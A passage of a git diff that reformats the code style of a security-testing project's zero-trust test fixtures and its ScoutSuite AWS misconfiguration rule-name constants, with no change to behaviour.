timestamp=datetime.strptime('2021-01-19 12:07:17.802138', '%Y-%m-%d %H:%M:%S.%f') + title="Process list", + message="Monkey on gc-pc-244 scanned the process list", + event_type="monkey_local", + timestamp=datetime.strptime("2021-01-19 12:07:17.802138", "%Y-%m-%d %H:%M:%S.%f"), ), Event.create_event( - title='Communicate as new user', - message='Monkey on gc-pc-244 couldn\'t communicate as new user. ' - 'Details: System error 5 has occurred. Access is denied.', - event_type='monkey_network', - timestamp=datetime.strptime('2021-01-19 12:22:42.246020', '%Y-%m-%d %H:%M:%S.%f') - ) + title="Communicate as new user", + message="Monkey on gc-pc-244 couldn't communicate as new user. " + "Details: System error 5 has occurred. 
Access is denied.", + event_type="monkey_network", + timestamp=datetime.strptime("2021-01-19 12:22:42.246020", "%Y-%m-%d %H:%M:%S.%f"), + ), ] TESTS = [ zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER + zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, ] STATUS = [ zero_trust_consts.STATUS_PASSED, zero_trust_consts.STATUS_FAILED, - zero_trust_consts.STATUS_VERIFY + zero_trust_consts.STATUS_VERIFY, ] class TestMonkeyZTFindingService: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_create_or_add_to_existing_creation(self): # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[0]] + ) # Assert that it was properly created findings = list(Finding.objects()) assert len(findings) == 1 @@ -55,17 +58,23 @@ class TestMonkeyZTFindingService: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_create_or_add_to_existing_addition(self): # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[0]] + ) # Assert that there's only one finding assert len(Finding.objects()) == 1 # Add events to an existing finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[0], status=STATUS[0], events=[EVENTS[1]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[0], status=STATUS[0], events=[EVENTS[1]] + ) # Assert there's still only one finding, only events got appended assert len(Finding.objects()) == 1 assert len(Finding.objects()[0].details.fetch().events) == 2 # Create new finding - MonkeyZTFindingService.create_or_add_to_existing(test=TESTS[1], status=STATUS[1], events=[EVENTS[1]]) + MonkeyZTFindingService.create_or_add_to_existing( + test=TESTS[1], status=STATUS[1], events=[EVENTS[1]] + ) # Assert there was a new finding created, because test and status is different assert len(MonkeyFinding.objects()) == 2 diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py index 732852174..08d6600a9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_consts.py @@ -1,4 +1,4 @@ -RULE_LEVEL_DANGER = 'danger' -RULE_LEVEL_WARNING = 'warning' +RULE_LEVEL_DANGER = "danger" +RULE_LEVEL_WARNING = "warning" RULE_LEVELS = (RULE_LEVEL_DANGER, RULE_LEVEL_WARNING) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py index f8c87083e..c08c7b614 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py @@ -1,7 +1,9 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudformationRules(RuleNameEnum): # Service Security - CLOUDFORMATION_STACK_WITH_ROLE = 'cloudformation-stack-with-role' + 
CLOUDFORMATION_STACK_WITH_ROLE = "cloudformation-stack-with-role" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py index 886999341..04d1599dd 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudtrail_rules.py @@ -1,11 +1,13 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudTrailRules(RuleNameEnum): # Logging - CLOUDTRAIL_DUPLICATED_GLOBAL_SERVICES_LOGGING = 'cloudtrail-duplicated-global-services-logging' - CLOUDTRAIL_NO_DATA_LOGGING = 'cloudtrail-no-data-logging' - CLOUDTRAIL_NO_GLOBAL_SERVICES_LOGGING = 'cloudtrail-no-global-services-logging' - CLOUDTRAIL_NO_LOG_FILE_VALIDATION = 'cloudtrail-no-log-file-validation' - CLOUDTRAIL_NO_LOGGING = 'cloudtrail-no-logging' - CLOUDTRAIL_NOT_CONFIGURED = 'cloudtrail-not-configured' + CLOUDTRAIL_DUPLICATED_GLOBAL_SERVICES_LOGGING = "cloudtrail-duplicated-global-services-logging" + CLOUDTRAIL_NO_DATA_LOGGING = "cloudtrail-no-data-logging" + CLOUDTRAIL_NO_GLOBAL_SERVICES_LOGGING = "cloudtrail-no-global-services-logging" + CLOUDTRAIL_NO_LOG_FILE_VALIDATION = "cloudtrail-no-log-file-validation" + CLOUDTRAIL_NO_LOGGING = "cloudtrail-no-logging" + CLOUDTRAIL_NOT_CONFIGURED = "cloudtrail-not-configured" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py index d22baafc7..954e6fc11 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudwatch_rules.py @@ -1,6 +1,8 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class CloudWatchRules(RuleNameEnum): # Logging - CLOUDWATCH_ALARM_WITHOUT_ACTIONS = 'cloudwatch-alarm-without-actions' + CLOUDWATCH_ALARM_WITHOUT_ACTIONS = "cloudwatch-alarm-without-actions" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py index 5d86b0b3e..6487bda99 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/config_rules.py @@ -1,6 +1,8 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ConfigRules(RuleNameEnum): # Logging - CONFIG_RECORDER_NOT_CONFIGURED = 'config-recorder-not-configured' + CONFIG_RECORDER_NOT_CONFIGURED = "config-recorder-not-configured" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py index dddf18b99..648fbed61 100644 --- 
a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ec2_rules.py @@ -1,35 +1,37 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class EC2Rules(RuleNameEnum): # Permissive firewall rules - SECURITY_GROUP_ALL_PORTS_TO_ALL = 'ec2-security-group-opens-all-ports-to-all' - SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL = 'ec2-security-group-opens-TCP-port-to-all' - SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL = 'ec2-security-group-opens-UDP-port-to-all' - SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL = 'ec2-security-group-opens-RDP-port-to-all' - SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL = 'ec2-security-group-opens-SSH-port-to-all' - SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL = 'ec2-security-group-opens-MySQL-port-to-all' - SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL = 'ec2-security-group-opens-MsSQL-port-to-all' - SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL = 'ec2-security-group-opens-MongoDB-port-to-all' - SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL = 'ec2-security-group-opens-Oracle DB-port-to-all' - SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL = 'ec2-security-group-opens-PostgreSQL-port-to-all' - SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL = 'ec2-security-group-opens-NFS-port-to-all' - SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL = 'ec2-security-group-opens-SMTP-port-to-all' - SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL = 'ec2-security-group-opens-DNS-port-to-all' - SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF = 'ec2-security-group-opens-all-ports-to-self' - SECURITY_GROUP_OPENS_ALL_PORTS = 'ec2-security-group-opens-all-ports' - SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP = 'ec2-security-group-opens-plaintext-port-FTP' - SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET = 'ec2-security-group-opens-plaintext-port-Telnet' - SECURITY_GROUP_OPENS_PORT_RANGE = 'ec2-security-group-opens-port-range' - EC2_SECURITY_GROUP_WHITELISTS_AWS = 'ec2-security-group-whitelists-aws' + SECURITY_GROUP_ALL_PORTS_TO_ALL = "ec2-security-group-opens-all-ports-to-all" + SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL = "ec2-security-group-opens-TCP-port-to-all" + SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL = "ec2-security-group-opens-UDP-port-to-all" + SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL = "ec2-security-group-opens-RDP-port-to-all" + SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL = "ec2-security-group-opens-SSH-port-to-all" + SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL = "ec2-security-group-opens-MySQL-port-to-all" + SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL = "ec2-security-group-opens-MsSQL-port-to-all" + SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL = "ec2-security-group-opens-MongoDB-port-to-all" + SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL = "ec2-security-group-opens-Oracle DB-port-to-all" + SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL = "ec2-security-group-opens-PostgreSQL-port-to-all" + SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL = "ec2-security-group-opens-NFS-port-to-all" + SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL = "ec2-security-group-opens-SMTP-port-to-all" + SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL = "ec2-security-group-opens-DNS-port-to-all" + SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF = "ec2-security-group-opens-all-ports-to-self" + SECURITY_GROUP_OPENS_ALL_PORTS = "ec2-security-group-opens-all-ports" + SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP = "ec2-security-group-opens-plaintext-port-FTP" + SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET = 
"ec2-security-group-opens-plaintext-port-Telnet" + SECURITY_GROUP_OPENS_PORT_RANGE = "ec2-security-group-opens-port-range" + EC2_SECURITY_GROUP_WHITELISTS_AWS = "ec2-security-group-whitelists-aws" # Encryption - EBS_SNAPSHOT_NOT_ENCRYPTED = 'ec2-ebs-snapshot-not-encrypted' - EBS_VOLUME_NOT_ENCRYPTED = 'ec2-ebs-volume-not-encrypted' - EC2_INSTANCE_WITH_USER_DATA_SECRETS = 'ec2-instance-with-user-data-secrets' + EBS_SNAPSHOT_NOT_ENCRYPTED = "ec2-ebs-snapshot-not-encrypted" + EBS_VOLUME_NOT_ENCRYPTED = "ec2-ebs-volume-not-encrypted" + EC2_INSTANCE_WITH_USER_DATA_SECRETS = "ec2-instance-with-user-data-secrets" # Permissive policies - AMI_PUBLIC = 'ec2-ami-public' - EC2_DEFAULT_SECURITY_GROUP_IN_USE = 'ec2-default-security-group-in-use' - EC2_DEFAULT_SECURITY_GROUP_WITH_RULES = 'ec2-default-security-group-with-rules' - EC2_EBS_SNAPSHOT_PUBLIC = 'ec2-ebs-snapshot-public' + AMI_PUBLIC = "ec2-ami-public" + EC2_DEFAULT_SECURITY_GROUP_IN_USE = "ec2-default-security-group-in-use" + EC2_DEFAULT_SECURITY_GROUP_WITH_RULES = "ec2-default-security-group-with-rules" + EC2_EBS_SNAPSHOT_PUBLIC = "ec2-ebs-snapshot-public" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py index 0d1d4e5d9..c4fad62ec 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elb_rules.py @@ -1,10 +1,12 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ELBRules(RuleNameEnum): # Logging - ELB_NO_ACCESS_LOGS = 'elb-no-access-logs' + ELB_NO_ACCESS_LOGS = "elb-no-access-logs" # Encryption - ELB_LISTENER_ALLOWING_CLEARTEXT = 'elb-listener-allowing-cleartext' - ELB_OLDER_SSL_POLICY = 'elb-older-ssl-policy' + ELB_LISTENER_ALLOWING_CLEARTEXT = "elb-listener-allowing-cleartext" + ELB_OLDER_SSL_POLICY = "elb-older-ssl-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py index f7a264cf3..90590a651 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py @@ -1,16 +1,18 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ELBv2Rules(RuleNameEnum): # Encryption - ELBV2_LISTENER_ALLOWING_CLEARTEXT = 'elbv2-listener-allowing-cleartext' - ELBV2_OLDER_SSL_POLICY = 'elbv2-older-ssl-policy' + ELBV2_LISTENER_ALLOWING_CLEARTEXT = "elbv2-listener-allowing-cleartext" + ELBV2_OLDER_SSL_POLICY = "elbv2-older-ssl-policy" # Logging - ELBV2_NO_ACCESS_LOGS = 'elbv2-no-access-logs' + ELBV2_NO_ACCESS_LOGS = "elbv2-no-access-logs" # Data loss prevention - ELBV2_NO_DELETION_PROTECTION = 'elbv2-no-deletion-protection' + ELBV2_NO_DELETION_PROTECTION = "elbv2-no-deletion-protection" # Service security - ELBV2_HTTP_REQUEST_SMUGGLING = 'elbv2-http-request-smuggling' + ELBV2_HTTP_REQUEST_SMUGGLING = "elbv2-http-request-smuggling" diff --git 
a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py index fef58e066..8589446bb 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py @@ -1,39 +1,41 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class IAMRules(RuleNameEnum): # Authentication/authorization - IAM_USER_NO_ACTIVE_KEY_ROTATION = 'iam-user-no-Active-key-rotation' - IAM_PASSWORD_POLICY_MINIMUM_LENGTH = 'iam-password-policy-minimum-length' - IAM_PASSWORD_POLICY_NO_EXPIRATION = 'iam-password-policy-no-expiration' - IAM_PASSWORD_POLICY_REUSE_ENABLED = 'iam-password-policy-reuse-enabled' - IAM_USER_WITH_PASSWORD_AND_KEY = 'iam-user-with-password-and-key' - IAM_ASSUME_ROLE_LACKS_EXTERNAL_ID_AND_MFA = 'iam-assume-role-lacks-external-id-and-mfa' - IAM_USER_WITHOUT_MFA = 'iam-user-without-mfa' - IAM_ROOT_ACCOUNT_NO_MFA = 'iam-root-account-no-mfa' - IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS = 'iam-root-account-with-active-keys' - IAM_USER_NO_INACTIVE_KEY_ROTATION = 'iam-user-no-Inactive-key-rotation' - IAM_USER_WITH_MULTIPLE_ACCESS_KEYS = 'iam-user-with-multiple-access-keys' + IAM_USER_NO_ACTIVE_KEY_ROTATION = "iam-user-no-Active-key-rotation" + IAM_PASSWORD_POLICY_MINIMUM_LENGTH = "iam-password-policy-minimum-length" + IAM_PASSWORD_POLICY_NO_EXPIRATION = "iam-password-policy-no-expiration" + IAM_PASSWORD_POLICY_REUSE_ENABLED = "iam-password-policy-reuse-enabled" + IAM_USER_WITH_PASSWORD_AND_KEY = "iam-user-with-password-and-key" + IAM_ASSUME_ROLE_LACKS_EXTERNAL_ID_AND_MFA = "iam-assume-role-lacks-external-id-and-mfa" + IAM_USER_WITHOUT_MFA = "iam-user-without-mfa" + IAM_ROOT_ACCOUNT_NO_MFA = "iam-root-account-no-mfa" + IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS = "iam-root-account-with-active-keys" + IAM_USER_NO_INACTIVE_KEY_ROTATION = "iam-user-no-Inactive-key-rotation" + IAM_USER_WITH_MULTIPLE_ACCESS_KEYS = "iam-user-with-multiple-access-keys" # Least privilege - IAM_ASSUME_ROLE_POLICY_ALLOWS_ALL = 'iam-assume-role-policy-allows-all' - IAM_EC2_ROLE_WITHOUT_INSTANCES = 'iam-ec2-role-without-instances' - IAM_GROUP_WITH_INLINE_POLICIES = 'iam-group-with-inline-policies' - IAM_GROUP_WITH_NO_USERS = 'iam-group-with-no-users' - IAM_INLINE_GROUP_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-group-policy-allows-iam-PassRole' - IAM_INLINE_GROUP_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-group-policy-allows-NotActions' - IAM_INLINE_GROUP_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-group-policy-allows-sts-AssumeRole' - IAM_INLINE_ROLE_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-role-policy-allows-iam-PassRole' - IAM_INLINE_ROLE_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-role-policy-allows-NotActions' - IAM_INLINE_ROLE_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-role-policy-allows-sts-AssumeRole' - IAM_INLINE_USER_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-user-policy-allows-iam-PassRole' - IAM_INLINE_USER_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-user-policy-allows-NotActions' - IAM_INLINE_USER_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-user-policy-allows-sts-AssumeRole' - IAM_MANAGED_POLICY_ALLOWS_IAM_PASSROLE = 'iam-managed-policy-allows-iam-PassRole' - IAM_MANAGED_POLICY_ALLOWS_NOTACTIONS = 'iam-managed-policy-allows-NotActions' - 
IAM_MANAGED_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-managed-policy-allows-sts-AssumeRole' - IAM_MANAGED_POLICY_NO_ATTACHMENTS = 'iam-managed-policy-no-attachments' - IAM_ROLE_WITH_INLINE_POLICIES = 'iam-role-with-inline-policies' - IAM_ROOT_ACCOUNT_USED_RECENTLY = 'iam-root-account-used-recently' - IAM_ROOT_ACCOUNT_WITH_ACTIVE_CERTS = 'iam-root-account-with-active-certs' - IAM_USER_WITH_INLINE_POLICIES = 'iam-user-with-inline-policies' + IAM_ASSUME_ROLE_POLICY_ALLOWS_ALL = "iam-assume-role-policy-allows-all" + IAM_EC2_ROLE_WITHOUT_INSTANCES = "iam-ec2-role-without-instances" + IAM_GROUP_WITH_INLINE_POLICIES = "iam-group-with-inline-policies" + IAM_GROUP_WITH_NO_USERS = "iam-group-with-no-users" + IAM_INLINE_GROUP_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-group-policy-allows-iam-PassRole" + IAM_INLINE_GROUP_POLICY_ALLOWS_NOTACTIONS = "iam-inline-group-policy-allows-NotActions" + IAM_INLINE_GROUP_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-group-policy-allows-sts-AssumeRole" + IAM_INLINE_ROLE_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-role-policy-allows-iam-PassRole" + IAM_INLINE_ROLE_POLICY_ALLOWS_NOTACTIONS = "iam-inline-role-policy-allows-NotActions" + IAM_INLINE_ROLE_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-role-policy-allows-sts-AssumeRole" + IAM_INLINE_USER_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-user-policy-allows-iam-PassRole" + IAM_INLINE_USER_POLICY_ALLOWS_NOTACTIONS = "iam-inline-user-policy-allows-NotActions" + IAM_INLINE_USER_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-user-policy-allows-sts-AssumeRole" + IAM_MANAGED_POLICY_ALLOWS_IAM_PASSROLE = "iam-managed-policy-allows-iam-PassRole" + IAM_MANAGED_POLICY_ALLOWS_NOTACTIONS = "iam-managed-policy-allows-NotActions" + IAM_MANAGED_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-managed-policy-allows-sts-AssumeRole" + IAM_MANAGED_POLICY_NO_ATTACHMENTS = "iam-managed-policy-no-attachments" + IAM_ROLE_WITH_INLINE_POLICIES = "iam-role-with-inline-policies" + IAM_ROOT_ACCOUNT_USED_RECENTLY = "iam-root-account-used-recently" + IAM_ROOT_ACCOUNT_WITH_ACTIVE_CERTS = "iam-root-account-with-active-certs" + IAM_USER_WITH_INLINE_POLICIES = "iam-user-with-inline-policies" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py index b303c8573..db8e2602b 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py @@ -1,19 +1,21 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class RDSRules(RuleNameEnum): # Encryption - RDS_INSTANCE_STORAGE_NOT_ENCRYPTED = 'rds-instance-storage-not-encrypted' + RDS_INSTANCE_STORAGE_NOT_ENCRYPTED = "rds-instance-storage-not-encrypted" # Data loss prevention - RDS_INSTANCE_BACKUP_DISABLED = 'rds-instance-backup-disabled' - RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD = 'rds-instance-short-backup-retention-period' - RDS_INSTANCE_SINGLE_AZ = 'rds-instance-single-az' + RDS_INSTANCE_BACKUP_DISABLED = "rds-instance-backup-disabled" + RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD = "rds-instance-short-backup-retention-period" + RDS_INSTANCE_SINGLE_AZ = "rds-instance-single-az" # Firewalls - RDS_SECURITY_GROUP_ALLOWS_ALL = 'rds-security-group-allows-all' - RDS_SNAPSHOT_PUBLIC = 'rds-snapshot-public' + 
RDS_SECURITY_GROUP_ALLOWS_ALL = "rds-security-group-allows-all" + RDS_SNAPSHOT_PUBLIC = "rds-snapshot-public" # Service security - RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED = 'rds-instance-ca-certificate-deprecated' - RDS_INSTANCE_NO_MINOR_UPGRADE = 'rds-instance-no-minor-upgrade' + RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED = "rds-instance-ca-certificate-deprecated" + RDS_INSTANCE_NO_MINOR_UPGRADE = "rds-instance-no-minor-upgrade" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py index 2538cf54d..20fa6337d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py @@ -1,19 +1,21 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class RedshiftRules(RuleNameEnum): # Encryption - REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED = 'redshift-cluster-database-not-encrypted' - REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED = 'redshift-parameter-group-ssl-not-required' + REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED = "redshift-cluster-database-not-encrypted" + REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED = "redshift-parameter-group-ssl-not-required" # Firewalls - REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL = 'redshift-security-group-whitelists-all' + REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL = "redshift-security-group-whitelists-all" # Restrictive Policies - REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE = 'redshift-cluster-publicly-accessible' + REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE = "redshift-cluster-publicly-accessible" # Logging - REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED = 'redshift-parameter-group-logging-disabled' + REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED = "redshift-parameter-group-logging-disabled" # Service security - REDSHIFT_CLUSTER_NO_VERSION_UPGRADE = 'redshift-cluster-no-version-upgrade' + REDSHIFT_CLUSTER_NO_VERSION_UPGRADE = "redshift-cluster-no-version-upgrade" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py index 4ba27a57a..a57d95f7c 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py @@ -1,29 +1,31 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class S3Rules(RuleNameEnum): # Encryption - S3_BUCKET_ALLOWING_CLEARTEXT = 's3-bucket-allowing-cleartext' - S3_BUCKET_NO_DEFAULT_ENCRYPTION = 's3-bucket-no-default-encryption' + S3_BUCKET_ALLOWING_CLEARTEXT = "s3-bucket-allowing-cleartext" + S3_BUCKET_NO_DEFAULT_ENCRYPTION = "s3-bucket-no-default-encryption" # Data loss prevention - S3_BUCKET_NO_MFA_DELETE = 's3-bucket-no-mfa-delete' - S3_BUCKET_NO_VERSIONING = 's3-bucket-no-versioning' + S3_BUCKET_NO_MFA_DELETE = "s3-bucket-no-mfa-delete" + S3_BUCKET_NO_VERSIONING = "s3-bucket-no-versioning" # Logging - S3_BUCKET_NO_LOGGING = 's3-bucket-no-logging' + S3_BUCKET_NO_LOGGING = "s3-bucket-no-logging" # Permissive access rules - 
